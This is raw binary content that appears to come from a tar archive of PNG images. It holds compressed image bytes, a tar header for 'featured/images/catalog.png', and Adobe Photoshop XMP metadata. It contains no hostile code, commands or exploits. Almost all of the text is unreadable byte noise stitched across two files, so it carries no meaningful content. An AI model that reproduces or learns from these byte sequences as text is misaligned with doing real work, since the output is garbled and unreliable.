�_�C{���}���N�m/x����Z�.94N�X)��k�H�T@K��KRG�-B&�0E��#C:[D�p�[0�;~���_+/�-�9�!��]�|�t��0%���b�{4�Ob�$��˗�+�pp	��p�E���3|V�W�o��K"���m>>���G�x9k�_�A����wd��7����Z�6{%%����Ob��4��0�Ņ���~
"�����!b�����?�y���!�KF5~Vz��0v�ƌ&��S&�-68����k�X>���M �0^�{���4�"S�W�1;8�i���/AYH�	�>zū �
C�iѕ!d<-X Ą`~x�����߷���O}�S��1Ѫі)/0`�/�����*1��MA�v�^��e���_��~�������xr0*I&%x�f�'L�b��'����NF��YI�R#mz��hhv�G���8��~WC�m�Ǣw�_I�KDبM�>Ľ��Ax�i$:@�"��ՄK
Chx38[�q�{�G�|ꩧ�O���ې��Ʈ����K�V�g�̏|�#`�芗�G8�L<���TS$�
��K��$�zr�~��ޡ�i�Ɗ'w3yd2�!c�r���˪�	<>;�8pa�GD�z����^<�+<��7�\8�ۇ��p��DQ��*�iI�H�����c���Ӆ�`��@�	+O��\߳�>���A?1i,zIa	��c�F�����l�i��p�����-�bx��O?
y�Ay�!�jy�*N�c�CL���"����ݓR\8[�+�h8%ۙ�'%%�#�n��*�	��,����4~�9V� [ƒ)��f�7p��C,�a���[�8,\ �	>n�{؟�c��p�����޽��~�{"�'��>ރ0�"< �;|��ǧ�'�n6�wK�_*=�•a7�
�B ��
 W�z�*�W�Е���<Nx������ʕ���s����?���!��֥h)� ��p��R
�Mmc�X5��xH�ޘ/�0���+�^�*�j�Bq�Z`8�ضt�NĬI��n�7��G�>}�3��n��E�b����}��院C5&-m�a���O��~�7�Kyo�@����-��2c�F�=����Z���N�9�ʷ\��'A`Qw4E��s���\�+W�L�6MK;C�!Ȁ��h��<��P�Ľ�Øs/���hfP7���[o�%���֎
���~"T'�����:ϙ��>o�_E!30�)��'�Po��f�}�h�c���{�^�k}t�~�6u6��E�e�$=A�p��1�-�^��C
j�-�n��-�	�ȿ⿂qLٚdE�6ߍ�)h,M����A�[�
?	mr!ϝ;W�?^qV�2�T䘌Q
d���-��U�Q�5�͆6�]�V��͛o�� �P_�\�q{x�{�c|�Ţ�V��:��S���S��\��&oИ;c�r�;˶&�F"A�����np��zX
-#��4@�åC�Md���&r~i}HR���	1�4�"�F��M8@	?QDiA��8D!.P���uvEOf47�_�~�߄�l���k��(4��Zi�Rx>�<LX �/�j�1���C2���sF����,�EQ��0)G�SG�s�
/rϋ�}�G3����aP m��2�35�1�Dr�rH��gm�~gs��(�N+��	��H�[>��C�E�-`�C�|��o��Z����Lq�_�3�*�������F,�߄
.n�F�p����ַx���!���˗�X�L�9���8�#<��H_'O�<w��̻���	-d6��:�����d,��L2E@�!�H|����U�%�b���v�1�M3Yd+2�JEI���*ɼE�LgddD��@���16V ��z��[�Zw��������(A�Wwg}i�L̬�u�9�5V͓�"ڤ.�[�bž�SIHcPZ�5Z�
������諯�
��s����F&D^U�ڼysl�K����>�
x/Y�}Uը4�J�gΜ��`��S�N�O�I�aH*�H��/��o.Jk4�	�\p8�s�o5��i�Q�T�S�x���+�O7�t�|B#�W|N��H�4�q�Ն�d���K7�G�W�*���]>D?�?��Za��u`I��m�ܡ"������xzX�A���a�VA0I,=�䩧��?��e˔]E�]eO�W�@6͏���Q��u�̙g�y�����A��;�3g�U�m]�s��̛7(pAh�N-�J�K�\�%*���j���� Ʃ.�ҩ�[�J��f�=��b�����.K�\���о�������3�c'�D�t�XC"�]+\�����o-�
���Occh���p���.�u�ƍ&��(~�!��[��S���**H�����w�^�!��g�x㍵k�nذahh跿��ٳgi,'�s'�׏�c�ρ��0tz� �j���
�O���kvwi�fꨥ?LQӎ$@~XzD�P����@Ni��$�v�boh�8�L|Z���il��$��(�d�u
.u<�57���m)1Ɗ����'���
�J ����������
�a��fŶ���'[�ly��>��v�?��zv�؁�
���ᆬK����?��ŋ��Ç��F;A��M�6��g��W�z�w�
�#|֬Y1�*$+7�(J?�T�1*sB/�����"��b��*ᓃ1H~���u9<g�`�����JW,?������DK��ؠa������n��dj�,�q�\PC5&����%@�p���Xhᮆ��o�t��x��dw=V>��X��K�T�h	��pddE�{]��O���x �������@��7��۷p�|�2�La��%�|t�…===pr�FP��ѣ�Lc�_HpQk��2�K�.��/�q�����T�SQ�2^*BM@
�`x�݈�J⒮K�0|���j�!zYY���֯�x����G�ɹ�R��ZLM��1{������įL�%2N��1Hi�V)�j+�/�
>
�p�!��|�R�*��ZWc�v�����F>��@Z��E�=�䓠�����������/:�iӀ4䧟~��صm۶�|�#�݁�j_�v�\�x X���A`z����ׯ���;w��]�VsA"y֬Y���c���>i�Q0��mx�x%?W�.�U`(�fyU&]��?$-�A��k�KIy�(�#DP��B�ZD�]�|�,�"��T�k's��P��_9��(�O��f���@OyoL�Ҡ�J�b|�77��B�c?��O�馛nڽ{7�O�2�W�2G�}���U�V%�R!��R�emD�kt._��h��>u�T,��G˟��g�?B�O<��uHZ��k_�4"FcaQiY�R��I*��S[�ѫ�Vl�3��.���Ub������/�.�ݗJ��{�5Y�o�p���N�os�JM�ɉGOՈ҅+kՒ!��૴i�]�^ ���ٳ�=��3f̠
U�>^���W��a�=C`>0
�f0p�[o�U�'�J����h�+�-��a�{��7��C��J�v]�_�b?�O�4b��~�{��Ӝɐ8���*r�2�<�F1M�菋v�p���}���Љ�%�}��K�M�_F�i�N哊5$�X��zy`E��sR ���}Wb�*qH I�����_�-��;�҃E�]��?�/0�Z#���<���|�;�b���'N�8u�T���N�%֣��V�1X��T�D����6?^XG�޲e��ŋ�ً�|�`�(��'c�c.���K�#Z�y�V�!��dh@�V��u
Rȍ2<���̘QBMrtK�u��c�+�Z���&{p$<�t钱F���0`�Xf���Bɠd�J
f	*|�OX1�O�V��\�w�v�����;@ݤk����{�rV���eT��˗�����^�sj�>M�l--����{�Νk��Ɔ��W��U��ӌ>-
x:��<�p�kmW�
�P�X�Q#3��G�6��/^D���KWE]�;�b��W����O���n����tqa�B<S[�p!�fl�H~d�����D �����۷b�
�#C�r�
��9�0mݺ����t|���sJ�%d�
�}c�x>IJ�9�+��o�](��G2+<#р�<��
�`����2Ƚ{������>ĔY�]c��:��3@��Ƭvҥ<P��c�m�~D�K��)P�c�
Wz_`�50���^���;�$�]�X�|�'?�IH��d��?zx���3���&4�f֩�뀯�I�K�:`c�M���0�(o��ck׮�4/�-Z7m`��]�{�
C5%
����-��ұ��k�����/#G�Z��'O�d",��S����͛��P^��uј�U`�|�际�1�7т���X�U�ECxzb<��3|�n�rʋ/��~��fq����{�P륗^b�
D�<�E�ު�i=��]?�)0}(����3��xH`��Zu��$gj{L���=�ҳ����h�!8O=��fd�y���=== *��r׮]��O<��J��<>:Gx�[f~�@l�w$�ȃ�j�������iאZQ��-�/h�\����*��#6�RL��9O�,X@�� Y�	^��@6ÇX+��%(��1;�R�7�T%z�"3̧�t����,[��#��9	K�,a�@$H��F�[|���8�#�ד���֌�x��ѿ�����K��V���x��-Tb�33b�$�4`���"�9�ނ^p���.��Z��`�rQ&v��R,*�p��"�.��"4X�o|eWx���
>AC��/|���!~z5�!^���{߃�ij͟����ZZ�j.\�`Z@V3@��Qʲ��af����&)J>�9�E礚$�
�����Eג'w�gT��_�
���;�'c�Z0f'�{ί*D�
����r6�A�.���0�ʻ��rc�C8�官����K�dӬ#V��(�,�bN<��"�3�A0����+8����	���"�=op�`ƞ{�97L3σ>�kϠ+�:�@��j_�ŊY�Y� ��H�Fc��"�	1�
qѰ���.Y�f�#���,���1X���8����G��ԣ��S�AQVӷ�7��!���K{Sۏ;�R�ӧOC��`R>_�Ny�!(-��=�=��*M�l�
(,S�8Z.����+6��̰�,O����с[W�%��*EΑ�Yy&�`��
7��i���q�L���V7A}JI��| ���%��<P��^�)z ���*��|��<u���'�ӟ��u�4ղI�Y�/�(�YWA���l����[X�_�l�O�ϦŰǞ<`\.
��/�H(T&���0�y���^k3���L�����8�e`�$����ri�ƣ��


Y���h���={�͆y��<��C;v��A$�^++]!	�u�-�W�&�3��I��A�bӦM�q�F&Kolm�/��zi�h�ca�)��J>�R��vM~���ER��a,S��a�i�
���*@���y��̑�>|��4�j>�_��ի�9��x2T(�Č�5kր�4@gF�����u��K�OYb"�hи�a)U�0���x��I(+���@��w�}�=�Ȣ�{�gpR³�'#���+Z��崾&e�L�/5>���'+�81kn=��8�7PT�Z��W��N�&�tf��@�d&k/3K^9Z�A�UՖn�CujzG�o��=]i{�	#bv�ԍ�Z��Х�X̙3��h��ޥ7z��Jq�ϟ�H\
��XKT_�Ym�$C�#y@�T����7h
�ɤ%&�ج�,�@?�f�ڵ�_�ϱ��*:=k7�Og��@�%�|]��dH,E����m�- ֥�Z�\w�uDB.OPv�5!�f��������ky���ϾB����o���[���?���/���NK�����6m�
K�W�
f��
*P�[�\?��H�D5x(._A>d"ܣ��N���B^"UZWOS�S�sR
2�'O�?���`�}�u�]:?
cHj���oM�W)H1Lr���,�{N?�Al������+�X� _I����N�&��[��&31�J�å���d'���QplבA�.HS2��s�:o���z�ZEio#�9S�s�5x�B�'�7������jq�Z�xqJ���4S0�[��a��p� ���B;���F���ĨD)[�����M�Js�C����gm���&ܴڇtM�>]�1&#�
�p�s�WNKє�@A�1�d�e��^�~OE����
oB�d_��~�_���9������u��B��1Ҫ����~�w�����!�����@��O�2�:)���XFY�Q7#s��˲��l��6[(H+�sA�,i]�µ`
�g�;d�u��bT��;wN�4��*�V>���t4u�T>hBM�~T!)R� p(�
m2ZS�u��H��FG�qT�)zN'��̙3�#&(u��p@	��C�8����C�1�`5}��aR���E`q7���A���m"��,��1�>	W���C���[$Rz��p�A�{�?�@�a�|Q)���O!���E6f�=T���	�ճPQ%�n*0�iX)��N��gٚ��߆R�");$��J�7<D�5�T�����
*�<
}�3�$�� ����'Ng=������י,�sp�+K;y�oΪ��۔�	W���d�Ν`�~c��X~��رc?/&���04�m�� H� 3�;����b�
��T�y�!�V�|�޴�Y	�W�^��IJ�׍��7	��$p[{!+i�=�!�5�N3�-2r��	_�CG��
ԁ�!��8鎟aW���K[�XTR��-T��}�d�����H�R S~�6+sg��h��d�"VpޫS)=Z�M[.j32l��N�M�^K4i/9}�t4:؅
\�	��;�E'�.�]��bd�oo����ſ�}�c఺:m�q`�$�
h��~�ɲi��5k�����Vv�5H�iԉ"���@NZ��a�v�w���
s|������ȯA��:e�\�RȡM���G.t�)��c��&�b\��uxxX4O��E�UΏ(�L�>.���ۏ�9�=[�'��>��Ӈ�9�>���q�&�A��|%n�3��Б#`��C��Bh��^���i4���"�iO�r�f%m`����RꋾPI�=k�c�iMӝ��'�QUi*4n]=�����W����Kl4�0yȭ�|�r��QҜVgv]#�TvBz�R"��0���)���2�򸽜�T\��8�W�E�#�R
W��e�(�0
��c��%]�X�c��[���g=DC��$zC�D��=(D�&`�{��N�^T�;2,ģ�}��btt�>-k�WY��V%eZ���ʰQO<�Ԉe��B��o����������0���7s�#3�u���*̞=���V!7�:�묕G
�ۍ"�C��bH��[���	Bl�·�d���*����X�mS�t�3SӪ��ɓ������
`eM�0��J�)��p�4VT.��e}�d�F�pc�M�\|*>ԥ!�{@ �#��R�N)#(��ԩS�Z,7@`7�|`no �c�-�7}N�V�={�0���@�A�z8�tŘQȑE8 U�1c�ٳg�2�n�hjA\|�A�~h�+dQK���o�'-�3����Z��<�`���'O��H�JA�h#��/���a*/2rs�ڵ��������`V�n3]ӆpA @W��&��g<gG�@-��ؑ�?N��]w������\{�1���o5����i"���c>ĥ�%,�)�R�8��F�x�.]���O� fG%��D�
��'!
�r����r己<��#�t_�xh�9.Pڣ����(CN��d��A-�#��8	�Э'60Sp �PC5U,i�W4����[�x1�Đ�i3~��U»)��|�r�3Z���g�N��g0^J译� *c7
��ZA���	ߢ7�2shYp�8e��z�4=���=�@h@i3
Z�$j���at~sȠ����2�ҏ%����B�Eb�x�"�eA��
��W�w-�al��x��[W����(�W��M�k9� ���{�*�M�5��	�������Htt�p�B���_���N�{I��\j�[aC�/�������������*�g.���GfI�����/���ԡ&�<ѳ<y,)�%q1�Ԋ��ִ:��T��'Oe5f�N�i`��,Yba�Pe>Y�
��:y�<�3��#m��
o �<��
�,b��9���i_?��-ސ3o@hk�)+���3�3T�B��ms�'���0k	��YJ+kF�؀Ԕ_��25��!��s�*r���%�������Qdc˴�'����Y�	%�,f�]R���P~�&�Ģ�����EYt&IˮC�㍴/�����\Yf���r����S�3:q℩ )��J�.��՚��ȭ/��O^�~IS���ր�������
�9,zoY\��U"E��>
	3W��Z�:ue�07��jEp�p��zV@����c1lz��
p��9jH$Г�4^���G�!f�s�/�Fw�ܹG}D#�(g�ʃ��i�!c�u�CY
9H���8&2{�l�u�����L@�ѻK������CzJ��ѣGͬ`ݐo��j2��K�"�oٲ��������k�V�6�ҳ��V;	�
�֭;~��%
��Լ����ǐTD9��D��3R��ח���mV
h ��������S61�������E�$�رcG�aG��:�+R��PS��Bp������f�z饗SCS|PV��WKkr�V�2�RL6�gB���o��f�iX�_>���xh�%����-�w��G?j�eA��G��{���sk<J����3x¬�햛�=��yB&+Fc��r��Av�[P�&�?h
�/�IY���͛� "�ܕ�Tä=�
��Ht;��26���‡L�p�{��&���c�|�)p�#�<b]��H���#�*Gק�a�*�]��<�Z�����O���n�"�5��gΜٱc�=���b�ɠ+�i")��`�ǎE�w5�6d�E�iTO�L�XD��`���RDN0pW1�ʒ���ÇQ�S^+'�����}�Ofj
'�M3�p��dn��nݺe�Y[�2���mV�5�1���n�S��%�[�������-O�j���6 _�]+�N���Z�e�l6)��*�v�ʡD�Tu��~[�| �$(̡�q��a��R|+�����`z��/��锼�܀p�l��I|��P-��͛�Џ��<�*���jd��'�&�|�ʕo�e(��넿JY���V�U�}U�V��[�ي6�Β��vJ�:�ieot%5��E��hL�G��P>�čh�D�Y����G�5��v�N�U�ڏ�͊�Z����Z�ukw�2���m|�A�I���cLxc��VD�Pԯn��VZ?A��?ւCг�>�OpTcye�ܹ�pc��yժU%Xg�8���)��TRc�Ç8�t�540���Մ�Zh��*ɖ��
Ҁ��K�h��π&=JW'�Ɛ!�_y�y]t�̙��̂�̬�,�e}�"(=��xF��ˇ���/�hRcP0����o0�ѽ:XmFń�	��E�C��p�m۶q�G�{��===�����?F�7��W&��/�4��eћ���d/̂@���^��EI���*�Ω��C�����5�A����`���0!�	�iò��}�"�.p�X|�ndԚ���fl�1$&���j.^r�ƣS(��T��̐l���D
g+n���(E���M��k�.S&�7��a ��I��&	�>ǎ�|��u4	џ!a4�!t��A ^/��T��o~�=��C(".�m5�.H�@̶=�i���gi*�9��&�EK�˜,� G����(ج��	�P������R�u�Do���P����O�kem��r�T3A����2�xB�[b{��#9�~�r�/��� &�=�����ژ���g�1�6�=f���,����RHey��\�O�`T�4uQ)�<OL�"�c9�*��c40��HLIg��`"FYY���|%��Ќ�2:���j��V.c@Z���M�Omة�,�g��bŴ��àݲ��L�����<�
c67�	2�mأ��E�l��YD�T@ j��\���4��c�<w��~��Ӑo��� �9��E�u(��
I��L�R���(Qqu"R�1�R�S�E(4�}�={�@�E�N���|��X�x�i�IoW��2ة��7o�C_�җLE��~[��;M��L;���|��տ���1UЊ�:^iEa�R5�˼�T�5�u�J��!�,�N��d��\���u��`�!l�4�x�:iY�u���LK�NU��)�|�'�~[X�r�
�D��A��T�DtB�i̼`��@H�**T�^�^
m 
4�t/��y��ۗ�#��dt�@��Z�U�[��V���L��ا'�Ys�c��:Z�J#���P�!/0j����O֎�̙��O��9O�C�o0x�����
�Ĝk�)��i�p:��Y�hsq�J�R
�u���e�Z�X!��MZ�,��P;�5w��%�B�m�R��������b)O�~}%�F�M*T<O�4�

�_k;�6mڊ+��✧��%�P�.�
�E��Х��ST���Trly0v3����g�����-Y�p߿?`
�y���uD10s<��׭uj�
 y�ÁDN^Y�j��J�P"kw��|��8qd�p����}��b0H��2k�i�6ރ�g�ߌļ��;wZ���k�``IgϞ�-Z�T�bt��d]J��*_t)�C�͙3j����j���.t>�(�+��@��
@I
Ji�Rb�,���h�g�M��<�-�8�����9G+ܻ<��<̮Ժ�b�z����l6<�000���
7� ��͚[���Ax$j�i̽���U/4t��te5s�hvA2���
z"!mL��pA@�-I�q��ʯV�⿵/X��1�����_����#�@��i�2B���]��e�����۷[�S�gM�~u���DdȬ��4ֶ��ҿ�L����TFW���-Liy
~e5,��f���%̔�X�I�1M�%o�:O�|]�6�Uf���dD�~�	�vX�<�z{Rn�
��x�����o2��v:���f��G�ү�.uЦE�[n���?���'�|�p��X��gy�0/�45��2����˖-S��
����YMU���r�
�T��Ƞ\�L�@���P��[�ͤK�c;Mz����d��Ή[�OMۡ*'m�<nJy��z���44\�{�+���*Hu���Q��Ղ��%V��¾�E�
�V����r�ٻ$�y�l|��1Cf��wi�E�-�_Yӌ�3r���yb�����
x�<!����L�֚R־�XqT�:k\�w���&i���-1V>��7B�s����bT4��XZ�5��<ӄ��UK�'P�K�J�y����]�i��ߡ���aSf��aM�{2����
���"_*ÒC�Ӿ;���e���Ų�U�ꪟHz=�ޡC��
��>��(g`��ij?�+*&��{��Հ9C#	PE��ڸ���B��yȺ|�Nj���'tb��Y�f
"���6J����s��̙3����MưH5$��o䣆={H�������������1�^Y�)�ϭW4Sm���2�p2"U�p��q��ߏ����|y�#H��j����z�Ԫ�U�sFrr������V;����"����U�^��(���"���v���O�-�u�Tyh�#��'�L��mٲE�+����5%4uj��.��C	�g�֭�����722��ӧOCA-Z&����=��W�"�N�u*<�HJ��O�9s�Iǻ�s�ܹ��m�6ڠ��h=z�(�!`�F,y�&m<��u�~5���,ȃ�<�=?�-`�m�W_}U�\b�QkE�WzzzD`�H��yL�TA��.m��,%�y���sںQ�[��j!'�i_"jb�Sy,d/�������+N�R����LO�a���ڹs'P�)8�N�`FQ���L!Pg��z���+3E0�hٍ7v��
*��vP���o��/~��
�1*��G s���c��3
��
��/�J;C�E'F��.�3l����դS��^��d%�$yȘ��<��t'��`�f���9��C�4�u�뮻�N�P 
FPq����>m�0(
*���0i^Q9�P���<��{=9m��[�[��p�\�؍s���b��¾��b�q���I[�4���w�l0�RϧR@N01�:��(�I��E�E#@��~�|��/��*Ó���+�W��1$RFY�"e�%F��o}:5R��;�h���2
B�V�g䕉��P�[b�vXl�S�K�4 �R]B,j�\w����d�K��_�CH̠�>wQ;[�"��@��*xRnRP1�?�������'�7�����("<Ibd�ᬛ�Bh�eiqǫ�'�{� c"П�vDS�Lz�OF���["s"�"w��KfI�$�4����_�D!����
��Ҵ�.�W�c��o��aW
�eZy�Pb�uo���gV�����z<&�&0�;8ZA�!iV	v��i��Ԣ#���py���k�!�$^���yDݳg6QD���)�b�^8���̄^#�������:-��h7�\�Q��.�Ӭ�_Z^x��hY�{S"p�b�#'��"&%.���X�?{ ��e�PE@������yS�M����ꥀ ��C5��[X����H�~끷���s	<#s֬YօAD!D}��%���i�2��/�0�o��Q�4�D�
3,k2&h)�R�I
9^`���h�S�N�S�,1���<�a�9�.�	
�	�R���K¤r��&T �ZD���ޛ�<
����~��ق�<Ih��Rs���5���x�SIKٵ<�Ca8�VT���E���)<�0��fd��c�Z!�l�cnjt7,�o�U<��)��9�;�� B��*w)��g�*y�v����pas]r���T�8��dg��(�T�c$����_���(�H�p`O�����j��˗��j#�Fʕ����p�%��1�1���O�����2xLKOs5x�g�=L�>���~w�]jJuj�忕�K��`�5��X1j<W(���W"vd�2�~�=�6V�ح�5�Nj�n��jդN�9%����r��K�R�Ø�0~���O�'Zo/�?��&�o��:�ok�Rݽ���\����4K�\���ms5Ws5x�\��\
�6Ws5x�\��\
�6Ws5�$�?�����n��j�:����f!�����}׻�[��(�e�mIEND�B`�featured/images/catalog.png000060400000020575152434416630011745 0ustar00�PNG


IHDR��u�;<tEXtSoftwareAdobe ImageReadyq�e<niTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:ba1a0bbd-1eda-3147-94f2-b3ae00a38842" xmpMM:DocumentID="xmp.did:2F481A39DFAC11E59C6A89C376A9410F" xmpMM:InstanceID="xmp.iid:2F481A38DFAC11E59C6A89C376A9410F" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:02CC8E5FDEEF11E5B542ED907CC6C15A" stRef:documentID="xmp.did:02CC8E60DEEF11E5B542ED907CC6C15A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>2��IDATx��]	�\e�>���٧3�e����	 K�XD����JD�j)�TJ@�B|T�JE���'�|�<E���g�D���BH&$���[ow}߹����=�==�}o�L��Nn/�������\�0�S���A�꠨Su���NuPԩ�:yB����ǂW�����6��A�N�U�͇�o�������0�MuI��Cz��s]�'\Ӵ�Ǫ��G�xO�����,�:0K�.=j@�|&�,�����3�<��~/�G~������<0_Q�ɫS���|Z�L��q����&x�sYS�UP�
�1�,�aL߀�
!ߍ�����]����/���s�����������:(*C�6�^>��1���EQ�;��D-���CR�������* DT��������>��
���y��ӥ�7�?*�A`P ��B�F"�=��kQ�vB���?/����@���5~�F�,�Ā��b�����S�( [k�ƩƟ��T�5(�	~	|%eiw���\p�����׏VP��[�O�W�QJ`��
�	�v=U1�\���|��o��M��ఔ��t:�x^�w㷺��
�W
4��� YSu��3��'̎T*u1�������(nNl��g,?m�ۼ�e����E_:0�c��a�/���b��|C]�3w@���0%�x�n�����e�i>�
vD��ev�\���(lJlP�q+���a7�EP||c]���1��[o�d2�x뮹��w��y�+���PH��,�ۏͅ�c���E�Uq<��'30��dC���J����Mu1���܄�Cȭ�

6\���.>or�x�
��Z�EPp��ؼ�/،8�q!^��_/���F��N"kD�.6o��EQ(�L��hD��EJ;K���5k\�!�u@T׿���{1�õ�澖�my�όT*eV@�L�v1J1���F�f��V4 �����+�nY�]��X�ekW	����L0�@���c�hnn��op���0#2�������֮]뚦����1���&�Z�BK�y��`��c038*�h��Z��|���o�[��w�
^���<11a2�IQ�T뛘��hll���qJ$��JVn;��mZ����he�ɓu
Q��n����e���G�pd现Jj�v�
����%dm�T%ײ�(4���|���Ω-�7l���I�@��v=(,]`��XC��GS��m�r
z
���.�ì��	V�����)&d�-/�ͯ�5�TcK�]��Z~�������u
P0@ؗ�9|��5)�@qY)�9��9���a5�Ky���;h��)��E�H��^uE�,��	�&���:��[���\LOO
��[�Q������I��жm�Z���

���ߧ�o���&D��6]_r���^�瓨�)��p��8�2+U���j��G�G0#y���P����(
PF�)��B��vͷp��sJ�$n�Ҡ�Ua�k8�����'M�,���|�,�	ct��&�5�� ���tڳ��Xp⼄�3������DS�͚0!NMaˍ�?�4(>Z
30�V�W;�a�$��U��>z ��`mZ�@@��-,�&���0�l�6�/Ï4&�N'G#x_s!D�+lpn�4(�A��E��9�
Ǽ3�FoJ��݇�f�p�Z5�q�w�t�����f�3܈B����u�-���S\D5�;��H�G��{�oJ��i�|g�ښ"�+���v)ÙDŽH����
�v��ط�
�D"�5C�����x,^wX�,M䓦~F���
D��
���x��G|v�o�
��)�L2C��e�}�H@����2�Pt�I�2�8�K�Ɛ�|���<�g'V7܆�(#
��lQ����ڛGS0�e�3].(��qUw��;<����?��
=�A��U���~�߱iq����]pLu�q�J_�Fw�2D{G3�e]+m��;hA4H�w5Ю�$�H���1��v�Lg6Ě���L5�S[8���-�m嚏3�	�H�v����TH�#Y\4g9I%�x��U�I�iIk�^<����N��6B=	�d|�?��<�r�bz���=ߛ��	�ҺD;�؇���$���ڧ���MG��bqg��	�gZy�$(x���1.���_�IWl��d��㟎�8! �&�%�m�Ѝ篤����o�fc8������K���YӖ���_H#�m��k����?���g7tF���(%��R��G�c:e���#���1!e��x	���q�������*�2Y����/����d�& "ш3.�(>���$=�����:+?�|�R:ii3]��C02�����|p�.��Nz��&�쉝t�K���!A)9L���`=�� =��0]����-������D<�$�À��Ox��I�7�I���ך��rA���./A�rw/��3H�X�F����f9�:�yt��KV��I*I�P8B�H4KS�Cp�-����j�浭&�uJ����O^gҠ�:Bx�і�-�Ju6�h ��1�A�����,���%2
N��t
A�Ae!��S˿.���2zVDc���Ʃ��Vj��R,�F}�70��<�+lZb�uh����MG4ĬS(�ɐ��@Sp�&f�[o�~�n� �Q0������k�u��
��	:��a��(���g/�_��K�FA�o۾!z�{����<4F0@���h]��'dz|�Z���y�S�e�]�ǃ�У{ƨ%�ˊR�'N����i�@/�죞�?��D�C'��)<���X*MCÃԀY������Y�d���,g�s���+��� �������d���Z�zj�8ݰ���=���!ཇ��'�Ӧ�F�彫�]ôw8M���E�z��>{�޻���7FǶ��|D,7<�CC�D�\�ہh%�qM�wv�l��)�
�DS�($�O��1�* 
$�x��
�A�q�1t�i�C�Ԁ�'�g�hAa�/P4ut�
ò(��Z��hf�@.�1P~�D�L�B��g�0��ϟ�	؏�p2�x���"�5´�	���=���P��S��7I?:w9�rL]t�Nh�	z����K�i�I�_j�Aa1}���`��4�Y3�8 �cE9���A�����ґ����}��T:��e�����gl>����3m}ѐ�5
���t�o��I�w�h�]�.N{G2t�Kg�f���C�'T�|Sm�6�����KR��y+[�{ϼE����������v��+���;�g�C:/���8Ɇ�ɨJ!rY�XB�&_�E�t}ά�=�W���ҷ����0}�]���)����5���Z�
���'hYS����(cht��|��W��y�ޓ��C*}m�"�sW����;}1-AX���濜�a��jH|�Olp�cI9����62��:/3KVb�p�y���Ѵ&$���"��X�3/ZI����;:�������h"�C�G��3����U�� �8���_y��r�B�$R4<8A_=u���(�F��Y$�
��J����sy�/�
	�A'�D�e)C�@��3�R��{��g%e�u:0M�\��?c9�ƿ1���pT����+ü�&�~gh�9M�e>|T�L��
T(���������|��%��dH�Y�!)D�3�G3,P�&���9��a'�5i�3���}��S�F�7iN�"�5�h�X9�V�����q�֦���3��*�r�e��V�[���IQ����SQyř�\խ�dU����6��r@�j^�>D_��C4:��`0`�sH�F�gG���3)�.�"}�y4�K�d/A�\?�-�}��~p /�e�J\d��I�SF�u��ǫ1��]���1U�pk��~�6�K�Y�]S0���!�*ۗ3#El���o���=/�K�-[F���S�5�S�DS��ju��i��t��	(&��~�6�J�Kʅ.De�-�$Y����Af
��w�,�g�Z*�����ޭ��$�FR Jˢ�mE�,�ך�\XJ'(�a��� �s1�	p�S	
�/�"�*�ᰕrr<bC���C�1�ğ�S�p.8�fօ��!��Ov�\�E�倂��%(�^�������f�E��:=z`���ƑG4�EiNYs=.�g����
��\x�{0<wG�a��k���02��䦖�1ȳ��,M�;�<]:��K�|�Cs���{)��E1�
\3`(�	�c�%�0"M���۹u��D���XL�:���yÉ��)�w�"��,��v<%���X�<�$�u1�|�NN�Aj�щ������)*�]w�� �e������y��)�7(`�~�
����<���b��B�iH�>w՝s�FS���jc"�[��Ua���b��&P8���6=�3�RV�������ծs!G9�qnN2��������'r���P�6(�_Thp�	sA�^�1���I$�&9�IDY7"�\�Η��Mͭ��S|
�<�ZBR,�X��R�V���,P��<y5��k~�ڇ�wUU�1�o�(��tz�c1�Wo0�p|�Lp�j񼥥��l�*����u����[n�©%
�bO9���5(v��]�p��R|A>h=���~(cC��f$�>���)s�e͖��6s�z�l���S|
�LȒ����(�h�]倂+~z���!�m2i9#�HG�{&�y*+1��`
!$M��R^�}PL	Imp��akMqOK�=�r����Tr�
�^�b,����Aj�FL����#�J��i�D����H
��t
��6�����;Ι>j�c��q9Xy�&Z4
M�C/N��R@�,yx[�S�,�w�������� L�J#��ƶ3j&D-��%^R�u�t2e:w��#N&�����$f���P��7���<rŘ��y��*�iLǶJ��3�7�迮�d�]�؛��e��Uh�5����4����� Z7˲�O!zp;�62���#t��-�$�氟҇Ӵ���v�]�v��(��(�BV��*UX��E&
�ӑ	/�Q����d2!c��,���^ϗ�Ew�����s�AJ�Q�1D�����*�	�	��"i˳lPp/�?�G���*���E/ҳK��Q�զ��L6w��������ҹ����T2s-�}) �|����t�'��izS�

��U�0(o��5Ȗ9Qu���9����^w��zL���Y݊����4jJT��C���|>
跥|W���
����W���k7����H6b������Q�95Oa��dP���+�=yL?y���8`;(gQ��]cMM�D&U�hsT[����2�6q�7(!�8�?S	��f
��k@������A�)��K	�ں?@a�p��f
}%�h
Sh'-?��/��f
��$�
�Ӯ��;{8���>S%:fQ��[IN�Y�eߞ�s�*�����!U��X��)D^B�"�����}n�bȶI�v�
|��$(�1�J�aB��6��^@���e��A�]^.��P���(f5;�.~�u�+�%(�L�G��n���N�A��!D7��ꂛ�ٟ�g2B<��܉�k)^v�g-�M����[Gs�وE�0�4Z��D���3�Ι��]�m�=���NsK��4Y�c�E3���
��㸯�7��Ź��+j>6,(*'��;��NTDKs�,�'*�v�f\��^
��OB3̍A�|F��,joo��n�buT
g����Pg�`��#!3�����D-���D���JA���ȣ���9�	��`E#�j�h�fsc���:u67ڭ��lw0�qa@�m�;���{��Q��;���q!(��x�4H�-j�F�����r�|-�b-��f���Wʀ��{q��:�PkI��rـZ"9�:��Y�g)Y�<���YsRuv�_�/���!�����!��cu1ya6؇�c����h��9�����U8!W��(�%P�D��h��\ ey|��1/CS0���ƙ�Zq�qx�k6��
